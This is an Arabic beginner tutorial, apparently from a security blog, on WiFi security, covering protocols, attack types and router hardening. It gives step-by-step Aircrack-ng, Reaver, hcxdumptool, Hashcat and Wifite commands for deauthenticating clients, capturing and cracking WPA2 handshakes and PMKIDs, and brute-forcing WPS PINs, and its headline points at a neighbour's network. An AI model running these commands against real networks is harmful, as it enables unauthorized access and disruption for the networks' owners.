شبكة WiFi جارك ليست محمية كما تظن — إليك الحقيقة الصادمة

شبكة WiFi جارك ليست محمية كما تظن — إليك الحقيقة الصادمة

الشبكات اللاسلكية: الدليل الشامل من الصفر | GloSecLab
// WIRELESS SECURITY // WiFi HACKING // BEGINNER GUIDE

الشبكات اللاسلكية
من الصفر حتى الاختراق الأخلاقي

دليل شامل للمبتدئين — كيف تعمل الشبكات اللاسلكية، بروتوكولات الأمان، أبرز الهجمات، وكيف تحمي شبكتك من المخترقين

Beginner Friendly WiFi Security Kali Linux GloSecLab
📡

ما هي الشبكات اللاسلكية؟

الشبكة اللاسلكية (Wireless Network) هي أي شبكة اتصال تنقل البيانات عبر موجات الراديو (Radio Waves) بدل الكابلات. تشمل WiFi، Bluetooth، ZigBee، NFC، وغيرها. في عالم الـ Cybersecurity، الشبكات اللاسلكية تمثل سطح هجوم واسع لأن أي شخص في نطاق الإشارة يمكنه التقاط الـ Traffic.

مع وجود أكثر من 35 مليار جهاز IoT متصلة لاسلكياً في العالم، أصبح اختبار أمان الشبكات اللاسلكية من أهم مهارات الـ Penetration Tester. فهم كيفية عملها هو الخطوة الأولى نحو اختبارها أو حمايتها.

⚠️ تحذير قانوني: أي عملية اختبار أو اختراق لشبكة لاسلكية بدون إذن صريح من صاحبها هي جريمة جنائية في معظم دول العالم. استخدم هذه المعلومات حصريًا في بيئات تدريبية مخصصة أو على شبكاتك الخاصة.

⚙️

كيف تعمل؟ — المفاهيم الأساسية

قبل ما تفهم الاختراق، لازم تفهم الأساسيات. هاك أهم المصطلحات اللي ستواجهها:

📶

SSID (Service Set Identifier)

هو اسم الشبكة اللي تشوفها عند البحث عن WiFi. يمكن إخفاؤه (Hidden SSID) لكن هذا لا يوفر حماية حقيقية.

📍

BSSID (Basic Service Set Identifier)

هو عنوان MAC الخاص بنقطة الوصول (Access Point / Router). يُستخدم في الـ Pentesting لتحديد الـ Target بدقة.

📡

Access Point (AP)

هو الجهاز (Router/Access Point) الذي يبث الشبكة اللاسلكية ويدير الاتصالات بين الأجهزة المتصلة.

🔑

Handshake (مصافحة المصادقة)

عند اتصال جهاز بالشبكة، يجري تبادل 4-Way Handshake لتأكيد الهوية. هذا الـ Handshake هو ما يُستهدف في هجمات WPA2.

📻

Channel (القناة)

الشبكات اللاسلكية تعمل على قنوات مختلفة (1-14 في 2.4GHz، 36-165 في 5GHz). معرفة القناة ضرورية لالتقاط الـ Traffic.

🔐

PMK / PTK (مفاتيح التشفير)

الـ PMK (Pairwise Master Key) يُشتق من كلمة المرور، والـ PTK (Pairwise Transient Key) يُستخدم لتشفير حركة البيانات الفعلية.


🌐

أنواع الشبكات اللاسلكية

📶
WiFi (IEEE 802.11)
الأكثر شيوعًا. تعمل على 2.4GHz و5GHz و6GHz. الإصدارات: 802.11b/g/n/ac/ax (WiFi 6/7).
🔵
Bluetooth
مدى قصير (10-100م). يُستخدم للأجهزة الطرفية. هجمات شهيرة: Bluejacking، Bluesnarfing، KNOB Attack.
📟
ZigBee / Z-Wave
يُستخدم في أجهزة IoT وأنظمة Smart Home. طاقة منخفضة لكن أمانه أضعف غالبًا.
💳
NFC / RFID
مدى قصير جداً (أقل من 20سم). يُستخدم في بطاقات الدفع وبطاقات الدخول. عرضة لهجمات Relay و Cloning.
📡
Cellular (4G/5G)
شبكات الهاتف المحمول. هجمات معروفة: IMSI Catching، Fake BTS (Stingray).
🛰️
Satellite / LoRa
للاتصالات على مسافات بعيدة. LoRa يُستخدم في IoT الصناعي. يمتلك نقاط ضعف في التشفير والمصادقة.
💡 Focus: في هذا المقال سنركز على WiFi (802.11) لأنها الأكثر استخدامًا وتوفر أكبر قدر من الموارد التعليمية في مجال الـ Pentesting.

🔒

بروتوكولات الأمان: WEP → WPA3

تطورت بروتوكولات أمان WiFi على مر السنين لمواجهة الثغرات المكتشفة:

البروتوكولالسنةالتشفيرمستوى الأمانالوضع الحالي
WEP 1997 RC4 (40/104-bit) ⛔ ضعيف جداً منسوخ تماماً — لا تستخدمه أبداً
WPA 2003 TKIP ⚠️ ضعيف منسوخ — تجنّبه
WPA2-Personal 2004 AES-CCMP ✅ جيد الأكثر استخداماً حالياً
WPA2-Enterprise 2004 AES + 802.1X ✅ جيد جداً للشركات والمؤسسات
WPA3-Personal 2018 SAE (Dragonfly) 🔐 ممتاز الموصى به — تفعيله إن أمكن
WPA3-Enterprise 2018 AES-256 + 802.1X 🔐 الأقوى للبيئات الحساسة

تفاصيل كل بروتوكول

WEP — الأول والأضعف. يستخدم مفتاح تشفير واحد مشترك بين كل الأجهزة، مما يجعل اختراقه سهلاً للغاية باستخدام أدوات مثل Aircrack-ng في دقائق. لا تستخدمه أبداً.

WPA — جاء كحل مؤقت لمشاكل WEP، يستخدم TKIP الذي أثبت لاحقاً أنه غير كافٍ. منسوخ رسمياً منذ 2012.

WPA2 — الأكثر استخداماً حالياً. يستخدم AES-CCMP للتشفير وهو قوي، لكن نقطة ضعفه الرئيسية هي الـ 4-Way Handshake الذي يمكن التقاطه وكسره Offline بـ Hashcat أو Aircrack-ng إذا كانت كلمة المرور ضعيفة.

WPA3 — الأحدث والأقوى. يستخدم SAE (Simultaneous Authentication of Equals) بدل الـ PSK، مما يجعله محصّناً ضد هجمات Offline Dictionary. يوفر كذلك Forward Secrecy — حتى لو سُرقت كلمة المرور لاحقاً، الجلسات السابقة تبقى محمية.

🔸 WPS (Wi-Fi Protected Setup): ميزة تسهيل الاتصال الموجودة في معظم الـ Routers. تحتوي على ثغرة خطيرة تسمح بكسر PIN المكون من 8 أرقام في دقائق باستخدام أداة Reaver. عطّلها فوراً في إعدادات الراوتر.

⚔️

أبرز الهجمات على الشبكات اللاسلكية

🤝
WPA Handshake Capture
التقاط الـ 4-Way Handshake عند اتصال جهاز، ثم كسره Offline بـ Hashcat أو Aircrack-ng. يعمل فقط مع كلمات مرور ضعيفة.
👻
Deauthentication Attack
إرسال حزم Deauth مزورة لفصل الأجهزة المتصلة وإجبارها على إعادة الاتصال — ما يتيح التقاط الـ Handshake.
👯
Evil Twin Attack
إنشاء شبكة وهمية بنفس اسم الشبكة الحقيقية وإشارة أقوى. الضحايا يتصلون بها بشكل تلقائي، مما يمكّن من اعتراض بياناتهم.
🕵️
PMKID Attack
هجوم حديث على WPA2 لا يحتاج لانتظار اتصال جهاز — يمكن استخراج الـ PMKID مباشرة من الـ AP وكسره Offline.
📌
WPS PIN Attack
استغلال ثغرة WPS لكسر PIN مكون من 8 أرقام في دقائق بأداة Reaver. يعمل على الـ Routers التي لم تُعطِّل WPS.
🎣
Captive Portal Attack
إنشاء صفحة تسجيل دخول وهمية على Evil Twin لجمع كلمة مرور الشبكة من الضحية مباشرة دون كسر تشفير.
👂
Passive Sniffing
التقاط وتحليل الـ Traffic اللاسلكي في الشبكات المفتوحة أو الضعيفة التشفير باستخدام Wireshark أو Airodump-ng.
🔁
KRACK Attack
Key Reinstallation Attack على WPA2 — يستغل ثغرة في عملية الـ Handshake. معظم الأنظمة الحديثة تم تصحيحها.

🛠️

الأدوات المستخدمة في Wireless Pentesting

هذه أبرز الأدوات المضمّنة في Kali Linux لاختبار الشبكات اللاسلكية:

Aircrack-ng
Suite كاملة: Monitor، Capture، Crack
Airodump-ng
مسح الشبكات والتقاط الـ Packets
Aireplay-ng
Packet Injection + Deauth Attacks
Airmon-ng
تفعيل Monitor Mode على الكارت
Reaver
كسر WPS PIN Attack
Hashcat
كسر WPA Handshakes بالـ GPU
Wifite
أتمتة هجمات WiFi تلقائياً
hcxdumptool
استخراج PMKID بدون Handshake
hcxpcapngtool
تحويل الـ Captures لـ Hashcat
Kismet
Network Detection + IDS لاسلكي
Bettercap
Evil Twin + MitM + Captive Portal
Wireshark
تحليل الـ Packets بصرياً
🔸 الكارت اللاسلكي المناسب: ليس كل كارت WiFi يدعم Monitor Mode وPacket Injection. الكروت الأفضل للـ Pentesting: Alfa AWUS036ACH، Alfa AWUS036NHA، TP-Link TL-WN722N v1.

👁️

Monitor Mode وPacket Injection

قبل أي هجوم على شبكة لاسلكية، تحتاج لتفعيل Monitor Mode على كارت الشبكة ديالك. في الوضع العادي (Managed Mode)، الكارت يستقبل فقط الـ Packets الموجهة له. في Monitor Mode، يلتقط كل الـ Traffic في الهواء بغض النظر عن وجهته.

BASH — Monitor Mode Setup
# عرض كروت الشبكة المتاحة iwconfig ip link show # إيقاف العمليات التي قد تتعارض مع Monitor Mode airmon-ng check kill # تفعيل Monitor Mode على الكارت (wlan0 مثلاً) airmon-ng start wlan0 # التحقق — سيظهر اسم جديد مثل wlan0mon iwconfig # إيقاف Monitor Mode (للرجوع للوضع العادي) airmon-ng stop wlan0mon # تفعيل Monitor Mode يدوياً (بديل) ip link set wlan0 down iw dev wlan0 set type monitor ip link set wlan0 up
BASH — Scan Networks with Airodump-ng
# مسح كل الشبكات المحيطة airodump-ng wlan0mon # مسح على باند 5GHz فقط airodump-ng --band a wlan0mon # استهداف شبكة معينة وحفظ الـ Packets # -c = Channel | --bssid = MAC الراوتر | -w = ملف الحفظ airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

🔬

أمثلة عملية — Aircrack-ng Suite

01 / التقاط WPA2 Handshake وكسره

هذا هو الهجوم الأكثر شيوعًا على WPA2-Personal. يتطلب: Monitor Mode + كلمة مرور ضعيفة في الـ Wordlist.

WPA2 — Handshake Capture + Crack
### STEP 1: تفعيل Monitor Mode airmon-ng check kill airmon-ng start wlan0 ### STEP 2: مسح الشبكات — لاحظ BSSID وChannel الهدف airodump-ng wlan0mon ### STEP 3: استهداف الشبكة والانتظار للـ Handshake airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w /tmp/capture wlan0mon ### STEP 4: (في Terminal آخر) إرسال Deauth لتسريع الـ Handshake # -0 10 = 10 حزمات Deauth | -a = BSSID الراوتر | -c = MAC الضحية aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon ### STEP 5: كسر الـ Handshake بـ Aircrack-ng # ابحث عن ملف capture-01.cap في /tmp aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF /tmp/capture-01.cap ### أو كسره بـ Hashcat (أسرع بكثير) hcxpcapngtool -o hash.hc22000 /tmp/capture-01.cap hashcat -m 22000 -a 0 hash.hc22000 rockyou.txt

02 / PMKID Attack (بدون Handshake)

هجوم حديث لا يتطلب انتظار اتصال أي جهاز — يُستخرج الـ PMKID مباشرة من الـ Router.

PMKID Attack — hcxdumptool
# استخراج PMKID من الـ Access Point hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 # تحويل للصيغة المناسبة لـ Hashcat hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng # كسر بـ Hashcat hashcat -m 22000 -a 0 pmkid.hc22000 rockyou.txt -r rules/best64.rule

03 / WPS PIN Attack بـ Reaver

WPS Attack — Reaver
# التحقق من تفعيل WPS على الشبكات المجاورة wash -i wlan0mon # شن هجوم WPS PIN # -i = Interface | -b = BSSID | -vv = Verbose | -c = Channel reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv # مع تأخير لتفادي الحجب (Router Lock) reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -d 5 -r 3:15 -vv

04 / Wifite — أتمتة كل الهجمات

للمبتدئين: Wifite تقوم بكل الخطوات تلقائياً — Monitor Mode، مسح، Deauth، التقاط Handshake، وكسره.

Wifite — Automated Attacks
# تشغيل Wifite (تلقائي كامل) sudo wifite # استهداف شبكة معينة بالاسم sudo wifite --essid "MyNetwork" # تحديد wordlist مخصصة sudo wifite --dict /usr/share/wordlists/rockyou.txt # WPA فقط + تجاهل WEP sudo wifite --wpa --no-wep
💡 للمبتدئين: ابدأ بـ Wifite لتفهم العملية كاملاً، ثم انتقل لـ Aircrack-ng Suite يدوياً لتفهم كل خطوة بتفاصيلها.

🛡️

كيف تحمي شبكتك اللاسلكية؟

🔐

استخدم WPA3 أو WPA2-AES على الأقل

تجنّب WEP وWPA وWPA2-TKIP بالكامل. فعّل WPA3 إن كان الراوتر يدعمه، وإلا فـ WPA2 مع AES (وليس TKIP).

🔑

كلمة مرور قوية وطويلة

استخدم كلمة مرور لا تقل عن 16 حرفاً تجمع أحرف كبيرة وصغيرة وأرقام ورموز. الكلمات القاموسية قابلة للكسر في دقائق.

🚫

تعطيل WPS فوراً

ادخل لإعدادات الراوتر وعطّل WPS (Wi-Fi Protected Setup). هذه الميزة لديها ثغرة خطيرة تسمح بكسر PIN في دقائق.

🌐

شبكة Guest معزولة للزوار

لا تعطِ كلمة مرور شبكتك الرئيسية للزوار. أنشئ شبكة Guest منفصلة بدون وصول للشبكة الداخلية.

🔄

تحديث Firmware الراوتر

الـ Firmware القديم يحتوي على ثغرات معروفة. تحقق دورياً من موقع الشركة المصنعة وثبّت التحديثات.

📡

تغيير بيانات الدخول للراوتر

admin/admin وadmin/password هي الأولى ما يُجرّبها المهاجم. غيّر اسم المستخدم وكلمة المرور لصفحة إدارة الراوتر.

📊

مراقبة الأجهزة المتصلة

راجع بانتظام قائمة الأجهزة المتصلة بشبكتك من لوحة الراوتر. أي جهاز غريب يعني احتمال وجود اختراق.

🏢

للشركات: WPA2/WPA3-Enterprise

استخدم 802.1X مع RADIUS Server بدل PSK. كل مستخدم يتصل بـ credentials خاصة به، مما يسهّل الإدارة ويمنع انتشار كلمة مرور واحدة.


الشبكات اللاسلكية هي من أوسع أسطح الهجوم في عالم الـ Cybersecurity — لأن أي شخص في نطاق الإشارة يمكنه محاولة الاختراق دون الحاجة لوصول فيزيائي. فهم كيفية عمل هذه الشبكات وبروتوكولاتها الأمنية هو الخطوة الأولى نحو حمايتها أو اختبارها بشكل أخلاقي. في المقالات القادمة سنتعمق أكثر في كل هجوم بشكل مفصّل. ابقَ أخلاقياً — الأداة محايدة، الاستخدام هو ما يُحدّد الفرق.

Penetration Testing · Kali Linux · OSINT

© 2026 GloSecLab — للأغراض التعليمية والأخلاقية فقط